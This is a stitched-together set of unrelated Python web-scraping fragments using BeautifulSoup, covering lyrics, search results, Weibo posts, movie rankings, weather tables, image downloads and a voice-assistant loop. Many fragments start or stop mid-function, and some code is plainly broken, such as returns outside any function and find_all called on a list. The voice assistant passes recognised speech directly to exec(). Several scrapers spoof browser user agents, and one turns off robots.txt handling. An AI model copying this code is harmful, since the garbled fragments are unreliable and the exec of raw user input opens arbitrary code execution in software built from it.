        if lyrics_containers:
            lyrics = ''
            for lyrics_container in lyrics_containers:
                # Genius puts annotations nested with the actual lyrics spans
                # In order to extract the lyrics correctly, need to replace HTML line breaks
                # with \n line breaks
                for br in lyrics_container.find_all('br'):
                    br.replace_with('\n')
                lyrics += lyrics_container.text
            return LYRICS_TUPLE(lyrics, url)
        lyrics_container = document.find(
            'div', class_=re.compile('LyricsPlaceholder__Message*'))
        if lyrics_container:
            # When the song is an instrumental, Genius sometimes puts a LyricsPlaceholder div
            lyrics = '[Instrumental]'
            return LYRICS_TUPLE(lyrics, url)
    except:
        if genius_key == '':
            logger.log(logger.LOG_LEVEL_INFO, SEARCH_ERROR.format(source='Genius', file=title))
        else:
            logger.log(logger.LOG_LEVEL_ERROR, PARSE_ERROR.format(source='Genius', file=title))
        return False
    return False
async def g_search_custom(message, client, search):
    loop = asyncio.get_event_loop()
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
    search = search.replace(' ', '+')
    async with aiohttp.get('https://www.google.com/search?q={}&start=1&num=1'.format(search), headers=headers) as gr:
        try:
            from BeautifulSoup import BeautifulSoup
        except ImportError:
            from bs4 import BeautifulSoup
        html = await gr.text()
        results = []
        parsed_html = BeautifulSoup(html, "html.parser")
        for item in parsed_html.find_all('h3', attrs={'class': 'r'}):
            results.append(str(item.a['href']).replace('/url?q=', '').split('&sa=U&ved=')[0])
        await client.send_message(message.channel, 'Top result for `{}`: '.format(search) + ''.join(results[0]))
def get_completions(request):
    completion1 = ""
    completion2 = ""
    completion3 = ""
    if request.method == "POST":
        html = request.POST.get('content')
        to_parse = find_between(html, "<p>---</p>", "<p>---</p>")
        if (to_parse[0] != ""):
            s = BeautifulSoup(to_parse[0], "html.parser")
            to_complete = ''.join(s.find_all(text=True))
            openai.api_key = os.getenv("OPENAI_API_KEY")
            pre_prompt = ''.join([
                "mount everest 8000m above see level\n",
                "lies in India and nepal\n",
                "###\n",
                "Mount Everest is 8000m above sea level and spans across India and Nepal\n",
                "###\n",
                "network for large number devices\n",
                "tested with 10\n",
                "no errors\n",
                "50%% less power usage\n",
                "###\n",
                "The network architecture was designed to be used for a large number of devices. We tested it with 10 devices at our lab, no errors while encountered. This implementation also reduces power consumption by 50%% relative to the previous solution.\n",
                "###\n",
                "first switch trial\n",
                "distributions match error data\n",
                "compare frequencies of strategies used on trial 1\n",
                "distribution of stratigies in older children different than 1 year olds and apes",
                "1 year olds and apes similar",
                "###\n",
                "the first switch trial revealed that distributions match the error data. Comparison of frequencies of strategies adapted on trial 1 showed that distribution of first-choice strategy in older children differed significantly from those of 1-year-olds and apes, which were in turn very similar to each other.\n",
                "###\n"
            ])
            print(pre_prompt)
            test = openai.Completion.create(engine="davinci-instruct-beta",
                                            prompt=pre_prompt + to_complete + "\n###\n",
                                            max_tokens=400,
                                            temperature=0.3,
                                            stop="###",
                                            n=3)
            print(test)
            print('---------------')
            print(to_parse[1])
            print(to_parse[2])
            completion1 = test['choices'][0]['text']
            completion2 = test['choices'][1]['text']
            completion3 = test['choices'][2]['text']
    return HttpResponse(json.dumps({
        "completion1": completion1,
        "completion2": completion2,
        "completion3": completion3
    }), content_type="application/json")
def parse_junit_results(output):
    try:
        directory = sys.argv[1]
    except:
        print("Error: Enter a valid local repository")
        return -1
    try:
        path = '../{}/target/surefire-reports/'
        path = path.format(directory)
        files = os.listdir(path)
    except IOError:
        print("Error: Configuration file not found or inaccessible.")
        return -1
    try:
        from BeautifulSoup import BeautifulSoup
    except ImportError:
        from bs4 import BeautifulSoup
    body = []
    for file in files:
        if file.startswith('TEST'):
            xml = open(path + file)
            soup = BeautifulSoup(xml, 'xml')
            failureLog = ''
            message = ''
            status = ''
            for tag in soup.find_all('testcase'):
                if tag is not None:
                    name = tag['classname']
                    step = tag['name']
                    if tag.find('failure') is not None:
                        status = 'FAIL'
                        try:
                            failure = tag.find('failure')
                            message = failure['message']
                            failureLog = base64.b64encode(bytes(failure.text, 'utf-8'))
                            failureLog = failureLog.decode('utf-8')
                        except:
                            message = 'None'
                            failureLog = ''
                    elif tag.find('skipped') is not None:
                        status = 'SKIP'
                    else:
                        status = 'PASS'
                    value = create_test_logs_json(name, step, status, message, failureLog, output)
                    body.append(value)
    return body
def parse(folder, inlinks, outlinks):
    """
    Read all .html files in the specified folder. Populate the two
    dictionaries inlinks and outlinks. inlinks maps a url to its set of
    backlinks. outlinks maps a url to its set of forward links.
    """
    filepath = '.\\' + folder + '\\*.html'
    for path in glob.glob(filepath):
        with open(path, 'r') as f:
            html = f.readlines()
            inlink = f.name.split('\\')[-1]
            bs = BeautifulSoup(''.join(html))
            for link in bs.find_all('a'):
                outlink = link.get('href')
                outlinks[inlink].add(outlink)
                inlinks[outlink].add(inlink)
def parse(self, html):
    '''
    Parse the weibo post data contained in the given HTML string.
    -----------------------------------------
    html: the HTML string to parse
    --------------------------------------
    return: a list of blogs
    '''
    bpos = html.find('<!--feed内容-->')
    epos = html.find('<!--翻页-->', bpos)
    bloghtml = html[bpos:epos].replace('\\/', '/') + '</div>'
    soup = BeautifulSoup(bloghtml)
    blogsouplist = soup.find_all('div', class_='WB_cardwrap WB_feed_type S_bg2 ')
    bloglist = []
    for blogsoup in blogsouplist:
        self.init_blog()
        self._parse_blog(blogsoup)
        bloglist.append(self.blog)
    return bloglist
def main():
    page = ''
    try:
        href = 'http://www.google.com.tw/'
        session = requests.Session()
        page = get_page(session, href)
        # print(page)
    except requests.exceptions.HTTPError:
        return None
    soup = BeautifulSoup(page)
    # print(soup.prettify())  # using BeautifulSoup 3
    if soup is None:
        print('soup is none')
    for img in soup.find_all(['img']):
        print img['src']
        # /logos/doodles/2014/world-cup-2014-42-4675815216250880-hp.gif
def crawl_page(session, can_url, url, todo, page):
    print("Crawling " + url)
    page.add_alias(url)
    req = session.get(url)
    print("\t" + req.url)
    soup = BeautifulSoup(req.text, 'html.parser')
    for link in soup.find_all('a'):
        if link.has_attr('href'):
            dest = urljoin(url, link['href'])
            href = urlparse(dest)
            if href.netloc != '' and href.netloc != can_url.netloc:
                continue
            if href.path == '.':
                continue
            if dest not in todo:
                todo.add(dest)
    page.form_inputs.update(get_form_inputs(soup))
def crawl(url):
    page = urllib2.urlopen(url)
    contents = page.read()
    soup = BeautifulSoup(contents)
    print(u'豆瓣电影250: 序号 \t影片名\t 评分 \t评价人数')
    for tag in soup.find_all('div', class_='item'):
        m_order = int(tag.find('em').get_text())
        m_name = tag.a.get_text()
        m_year = tag.span.get_text()
        for y in tag.find_all('em'):
            if y.get_text() != m_order:
                score = y.get_text()
        '''m_rating_num = int(tag.find_all('em').get_text())'''
        la = []
        for n in tag.find_all('span'):
            la.append(n)
        if len(la[4].get_text()) <= 4:
            m_rating_num = la[5].get_text()
        else:
            m_rating_num = la[4].get_text()
        print("%s %s %s %s %s" % (m_order, m_name, m_year, score, m_rating_num))
def html_to_json(content, indent=None):
    soup = BeautifulSoup(content, "lxml")
    rows = soup.find_all("tr")
    headers = {}
    thead = soup.find("thead")
    if thead:
        thead = thead.find_all("th")
        for i in range(len(thead)):
            headers[i] = thead[i].text.strip().lower()
    data = []
    for row in rows:
        cells = row.find_all("td")
        if thead:
            items = {}
            for index in headers:
                items[headers[index]] = cells[index].text
        else:
            items = []
            for index in cells:
                items.append(index.text.strip())
        data.append(items)
    return json.dumps(data, indent=indent)
def getSubGroups(url, group):
    log.write("-getSubGroups-\n")
    try:
        html = requests.get(url + group.getLink())
        content = BeautifulSoup(html.text, "lxml")
        log.write("->Got " + group.getName() + "'s page content\n")
        # Log file which will contain all twitter ids labeled according to the groups
        subGroup = None
        # Retrieving groups and people listed below these groups
        for div in content.find_all('div', {"class": ["size14", "person-box"]}):
            # Subgroup found
            if "size14" in div.attrs['class']:
                if subGroup != None:
                    # Adding a subgroup to its respective group
                    group.addCollection(subGroup)
                try:
                    subGroup = Group()
                    subGroup.setLink(div.a['href'])
                    subGroup.setName(div.text.encode('utf-8'))
                except Exception, e:
                    log.write('erro: ' + str(e) + '\n')
            # Person found
            if "person-box" in div.attrs['class']:
                divPerson = div.find('div', 'name')
                try:
                    person = Person()
                    person.setName(divPerson.text.encode('utf-8'))
                    person.setLink(divPerson.a['href'])
                    # Retrieving this person's twitter id
                    get_twitter_screen_name(url, person)
                    # Adding a person to its respective subgroup
                    subGroup.addCollection(person)
                    # Registering this information in the log file
                    f.write(group._name + ' - ' + subGroup._name + ' - ' + person._name + ' - ' + person._screen_name + '\n')
                except Exception, e:
                    log.write('erro: ' + str(e) + '\n')
def visit(scheme, domain, resource):
    '''
    Visit 'url' with designated 'user_agent'
    return a 'resources' list with unique elements
    '''
    global _non_visited_links
    temporal_resource_list = list()
    if resource.startswith('/'):
        url = "%s://%s%s" % (scheme, domain, resource)
    else:
        url = "%s://%s/%s" % (scheme, domain, resource)
    print("visiting: url: %s" % url)
    request = requests.get(url, headers=user_agent)
    soup = BeautifulSoup(request.text)
    resources = {
        'anchor': (soup.find_all('a'), 'href'),
        'iframe': (soup.find_all('iframe'), 'src'),
        'frame': (soup.find_all('frame'), 'src'),
        'img': (soup.find_all('img'), 'src'),
        'link': (soup.find_all('link'), 'href'),
        'script': (soup.find_all('script'), 'src'),
        'form': (soup.find_all('form'), 'action'),
    }
    for res in resources.values():
        tags, attr = res
        for tag in tags:
            if tag.has_attr(attr):
                temporal_resource_list.append(tag[attr])
    if resource.startswith('/'):
        resource = resource[1:]
    _visited_links.append(resource)
    _non_visited_links.extend(resource_filter(domain, temporal_resource_list))
import sys, os
try:
    from BeautifulSoup import BeautifulSoup
except:
    from bs4 import BeautifulSoup
import urllib.request, re, csv

html = urllib.request.urlopen("http://snr.unl.edu/lincolnweather/data/monthly-observed-vs-normals.asp")
soup = BeautifulSoup(html, "lxml")
tables = soup.find_all("table")
print(len(tables))
temps = tables[0]
with open("mon_temps_lnk.csv", "w", newline="") as csvfile:
    writer = csv.writer(csvfile)
    for row in temps.find_all("tr"):
        data = []
        for cell in row.find_all("td"):
            data.append(cell.text)
        print(data)
        writer.writerow(data)
dir_location = "{}/{}".format(settings.cache_directory, user.id)
if not os.path.exists(dir_location):
    os.makedirs(dir_location)
if num == 0:
    print("scraping {}...".format(user.permalink))
num += 1
with urllib.request.urlopen(tracks_page) as response:
    html = response.read()
soup = BeautifulSoup(html, "html.parser")
for article in soup.find_all(class_='audible'):
    track = article.find('a', attrs={"itemprop": "url"}, href=True)
    timestamp = article.find('time')
    file_location = "{}/{}.json".format(dir_location, track['href'].split("/")[-1:][0])
    if os.path.exists(file_location):
        continue
    info = {
        "id": -1,
        "title": track.text,
        "duration": -1,
        "timestamp": timestamp.text,
        "description": "API request was rejected, unable to scrape for description.",
        "permalink": "http://soundcloud.com{}".format(track['href']),
def parser_core(word_extract):
    parse_soup = BeautifulSoup(word_extract)
    text_file.write("Main Word:")
    text_file.write("\n")
    for word in parse_soup.find_all("b"):
        text_file.write(word.get_text())
        text_file.write("\n")
    text_file.write('\n')
    text_file.write("Part of Speech:")
    text_file.write("\n")
    for word in parse_soup.find_all("i"):
        text_file.write(word.get_text())
        text_file.write("\n")
    text_file.write("\n")
    text_file.write("Definition:")
    text_file.write("\n")
    definition = re.search(re.compile('<td>(?!<).*</td>'), str(word_extract)).group()
    Definition_Soup = BeautifulSoup(definition)
    for word in Definition_Soup.find_all("td"):
        text_file.write(word.get_text())
        text_file.write("\n")
    text_file.write("\n")
    text_file.write("Synonyms:")
    text_file.write("\n")
    while True:
        check_syn = re.search(re.compile('<td><span>.*?</span></td>', re.DOTALL), str(word_extract))
        if check_syn == None:
            text_file.write("None")
            text_file.write("\n")
            break
        syn_ant = re.search(re.compile('<td><span>.*?</span></td>', re.DOTALL), str(word_extract)).group()
        synonyms_soup = BeautifulSoup(syn_ant)
        for word in synonyms_soup.find_all("span"):
            parser_synonyms = word.get_text()
            parser_synonyms = re.sub('^\n', '', str(parser_synonyms))
            parser_synonyms = re.sub(',[ \t]', ',\n', str(parser_synonyms))
            parser_synonyms = re.sub(',', '', str(parser_synonyms))
            text_file.write(parser_synonyms)
            text_file.write("\n")
        if True:
            break
    text_file.write("\n")
    text_file.write("Antonyms:")
    text_file.write("\n")
    syn_ant = re.sub(re.compile('<td><span>.*?</span></td>', re.DOTALL), '', str(syn_ant), 1)
    while True:
        check_ant = re.search(re.compile('<td><span>.*?</span></td>', re.DOTALL), str(syn_ant))
        if check_ant == None:
            text_file.write("None")
            text_file.write("\n")
            text_file.write("\n")
            break
        syn_ant = re.search(re.compile('<td><span>.*?</span></td>', re.DOTALL), str(syn_ant)).group()
        antonyms_soup = BeautifulSoup(syn_ant)
        for word in antonyms_soup.find_all("span"):
            parser_antonyms = word.get_text()
            parser_antonyms = re.sub('^\n', '', str(parser_antonyms))
            parser_antonyms = re.sub(',[ \t]', ',\n', str(parser_antonyms))
            parser_antonyms = re.sub(',', '', str(parser_antonyms))
            text_file.write(parser_antonyms)
            text_file.write("\n")
        text_file.write("\n")
        if True:
            break
from bs4 import BeautifulSoup
import urllib2

webpage = urllib2.urlopen('http://en.wikipedia.org/wiki/Main_Page')
soup = BeautifulSoup(webpage)
for anchor in soup.find_all('a'):
    print(anchor.get('href', '/'))
def main(input=input, *args):
    response = "hi"
    choose = False
    choice = "go"
    YorN = None
    words = [""]
    chunk = 0
    link = 0
    global droid, prompt
    #### MAIN LOOP:
    while response is not "":
        ################### input and convert to list of words
        print "input1=" + input, "response1=" + response  # , "choice="+choice
        while input == "" or input == "nospeech" or input is None:
            input = droid.recognizeSpeech().result
        if not response:
            print "noresponse"
            input = droid.recognizeSpeech().result
            # exec(channel)
        if choose:
            print "choose"
            prompt = choice
            choice = droid.recognizeSpeech().result
            input = "choose"
            # exec(channel)
        if not choose and response:
            input = droid.recognizeSpeech().result
            # prompt = response+'>'; exec(channel)
        if input is None:
            time.sleep(7)
            input = ""
            # print 2  # exec(channel)
        else:
            print "input2=", input
            # exec('print 2')
        # if input is None:
        #     prompt = response+'>'
        #     input = raw_input('>')
        try:
            words = input.split(" ")
        except:
            pass
        #### set context(s)
        '''if context:
            phrase2 = raw_input(str(context) + ' is ')
            context['action'] = phrase2; context = None
            print dctn[df[0]]['action']
            #confirm = raw_input('confirm?')
            #if confirm == 'y': context = confirm; context = None; input = "okay"'''
        ################### direct commands
        if input == "quit":
            response = ""
        if input == "save":
            PBcreateBranch()
            break
        if input == "dctn":
            response = str(dctn)
            print response, dctn
            continue
        if input == "hi":
            response = "hello"
        if prompt == "anything else? (yes/no)>":
            if YorN == "yes":
                pass
            if YorN == "no":
                break
        ################### keyword based commands
        ########## definitions
        if " is " in input and not "what is " in input and not words[0] == "is":
            df = input.split(" is ")  # definition
            try:
                dctn[df[0]] = df[1]
            except:
                print "error, not entered"
            # dctn[df[0]] = [df[1]]
            if df[1] == "action":
                dctn[df[0]] = {"action": ""}
                response = "how " + df[0] + "?"
                context = dctn[df[0]]
            response = "okay"
            # continue
        if " is not " in input:
            split = input.split(" is not ")  # remove definition
            try:
                dctn[split[0]].remove(split[1])
            except:
                pass
        ######## question
        if "?" in input:
            input = input.strip("?")
        if "what is" in input:
            q = input.split("what is ")
            # print dctn[q[1]]
            if q[1] in dctn:
                response = dctn[q[1]]
            else:
                try:
                    input = "search " + q[1]
                except:
                    response = q[1] + " is not known"
        ######## google
        if "search" in input:
            query = input.replace("search ", "")
            print "searching " + query
            from pygoogle import pygoogle
            g = pygoogle(query)
            g.pages = 1
            results = g.__search__()
            # print str(results)
            choose = True
            response = results[link]["content"]
            # response = repr(response)
            response.encode("ascii")
            # response.encode('ascii', 'ignore')
        ##################################################################################
        if choose:
            print "chooseTrue"
            if choice == "next":
                link = link + 1
                print "link=", link
                response = results[link]["content"]
                # response = repr(response)
                response.encode("ascii")
            if choice == "go":
                br = mechanize.Browser()
                br.set_handle_robots(False)
                br.addheaders = [
                    (
                        "User-agent",
                        "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1",
                    )
                ]
                page = br.open(url)
                response = page.read()
                soup = BeautifulSoup(response, "html.parser")
                # paras = soup.p  # findAll('p', text=True)
                VALID_TAGS = ["p", "span"]  # , 'ul', 'li', 'br'] 'div',
                paras = [
                    i.text.encode("ascii", "ignore") for i in soup.find_all(VALID_TAGS)
                ]  # removes <p>s
                paras = filter(None, paras)
                paras = [i.replace("\n", ".").replace("\r", ".") for i in paras]
                paras = [
                    i.replace("(", "parens").replace(")", "parens").replace("[", "bracket").replace("]", "bracket")
                    for i in paras
                ]
                input = raw_input("pause")
        ######## actions
        if "e" in input:
            exec1 = input.split("e ")  # exec
            try:
                exec (exec1[1])
                continue
            except Exception, e:
                print str(e)
        if "do" in input:  # action
            try:
                exec (dctn[words[1]]["action"] + ' "' + str("".join(words[2:99])) + '"')
                continue
            except Exception, e:
                print str(e)
        # f = open('/home/sunying/hello-jane/weathercrawler/f.txt', 'w')
        # f.write(self.html)
        # f.close()
        self.page.close()
        return self.soup


crawler = Crawler(url)
csoup = crawler.getHtml(url)
# f = open('/home/sunying/hello-jane/weathercrawler/sucess/soup.html', 'w')
csoup = str(csoup)
# print csoup
# f.close()
# soup = open('/home/sunying/hello-jane/weathercrawler/sucess/soup.html')
soup = BeautifulSoup(csoup)
# soup = soup.prettify()
csoup = soup.find_all("div", id="tqyDiv")
csoup = csoup.find_all("div", id="gdDiv")
csoup = csoup.find_all("div", class_="hzDqDivClass")  # , id="gdDiv")
# print soup
res = re.compile(r'<div id=\"dq\d\" onclick=\".+\">([\u4e00-\u9fa5]{2})</div>')
result = res.findall(str(csoup))
print result
# print len(result)
# f = open('/home/sunying/hello-jane/weathercrawler/re.csv', 'w')
with open('/home/sunying/hello-jane/weathercrawler/hzqx.csv', 'wb') as csvfile:
    # spamwriter = csv.writer(csvfile, delimiter=' ', quotechar='|', quoting=csv.QUOTE_MINIMAL)
    i = 0
    while i < len(result):
        spamwriter = csv.writer(csvfile, dialect='excel')
        spamwriter.writerow(result[i])
        # f.close()
        self.page.close()
        return self.soup


month = 1
while month <= 12:
    crawler = Crawler(year, month, city)
    # print crawler.url_back()
    csoup = crawler.getHtml(crawler.url_back())
    # f = open('/home/sunying/hello-jane/weathercrawler/sucess/soup.html', 'w')
    csoup = str(csoup)
    # print csoup
    # f.close()
    # soup = open('/home/sunying/hello-jane/weathercrawler/sucess/soup.html')
    soup = BeautifulSoup(csoup)
    # soup = soup.prettify()
    csoup = soup.find_all("table")
    # print soup
    res = re.compile(r'<td><strong>(\d|\d{2})</strong></td>'
                     + r'<td>(-?\d+\.\d|-?\d{2}|-|\d|-?\d|-?\d+\.\d{2}|-?\d+\.\d{2})</td>' * 10)
    result = res.findall(str(csoup))
    result = list(result)
    print result
    # f = open('/home/sunying/hello-jane/weathercrawler/hzqx/try.csv', 'a')
    # f.write(str(result))
    # f.close()
    # print len(result)
    # f = open('/home/sunying/hello-jane/weathercrawler/hzqx/try.csv', 'a')
    with open('/home/sunying/hello-jane/weathercrawler/hzqx/hzweather.csv', 'a') as csvfile:
        # spamwriter = csv.writer(csvfile, delimiter=' ', quotechar='|', quoting=csv.QUOTE_MINIMAL)
        spamwriter = csv.writer(csvfile, dialect='excel')
        spamwriter.writerow(['%4d-%02d' % (2012, month)])
# coding:utf-8
import requests
from bs4 import BeautifulSoup

DownPath = "~/material/spider/www.meizitu.com/pic"
head = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'}
TimeOut = 5
PhotoName = 0
c = '.jpeg'
PWD = DownPath
for x in range(1, 4):
    site = "http://www.meizitu.com/a/qingchun_3_%d.html" % x
    Page = requests.session().get(site, headers=head, timeout=TimeOut)
    Coding = (Page.encoding)
    Content = Page.content  # .decode(Coding).encode('utf-8')
    ContentSoup = BeautifulSoup(Content)
    jpg = ContentSoup.find_all('img', {'class': 'scrollLoading'})
    for photo in jpg:
        PhotoAdd = photo.get('data-original')
        PhotoName += 1
        Name = (str(PhotoName) + c)
        r = requests.get(PhotoAdd, stream=True)
        with open(PWD + Name, 'wb') as fd:
            for chunk in r.iter_content():
                fd.write(chunk)
print("You have downloaded %d photos" % PhotoName)
    <td headers="pltab1time">19:50:01</td>
    <td class="bold" headers="pltab1artist">Jason Derulo</td>
    <td headers="pltab1title">In my head</td></tr>
    <tr class="wsOdd"><td headers="pltab1time">19:45:30</td>
    <td class="bold" headers="pltab1artist">Lena</td>
    <td headers="pltab1title">Neon (Lonely People)</td>
    </tr></tbody></table></div>
"""

soup = BeautifulSoup(html_doc2)
# print(soup.prettify())
# print(soup.find_all('td'))
# print(soup.find_all("td", "headers"))
print(soup.find_all(headers=re.compile("pltab1artist|pltab1title")))
# print(soup.title.string)
"""
for headers in soup.find_all('td'):
    print(soup.find(headers="pltab1artist"))
    print(soup.find(headers="pltab1title"))
"""
# for headers in soup.find_all('td'):
#     print(headers.get('td'))
#     headers="pltab1artist"
        if imgs[1]:
            ensure_dir(loc)
            total_page_div = soup.find('span', class_='red')
            if (hasattr(total_page_div, 'text')):
                total_page = int(total_page_div.text)
            else:
                total_page = 1
            for i in range(2, total_page + 1):
                imgs[i] = get_img_from_url(url + "&pn=" + str(i))
            for i in imgs:
                for j in imgs[i]:
                    links.add(j.get('src'))
            thread.start_new(down_links_to_folder, (links, dirname))
        return links
    except Exception, e:
        print 'error..', e


baidu_base_url = 'http://tieba.baidu.com'
baidu_homepage = requests.get("http://tieba.baidu.com/f?ie=utf-8&kw=%E5%A7%90%E8%84%B1")
soup = BeautifulSoup(baidu_homepage.content)
titles = soup.find_all('a', target="_blank", class_="j_th_tit")
urls = {}
for i, title in enumerate(titles):
    urls[i] = baidu_base_url + title.get('href')
    print urls[i], title.text.encode('gbk', 'ignore')
for i in urls:
    thread.start_new(get_tieba_img_url_from_url, (urls[i] + '?see_lz=1',))
# time.sleep(100000)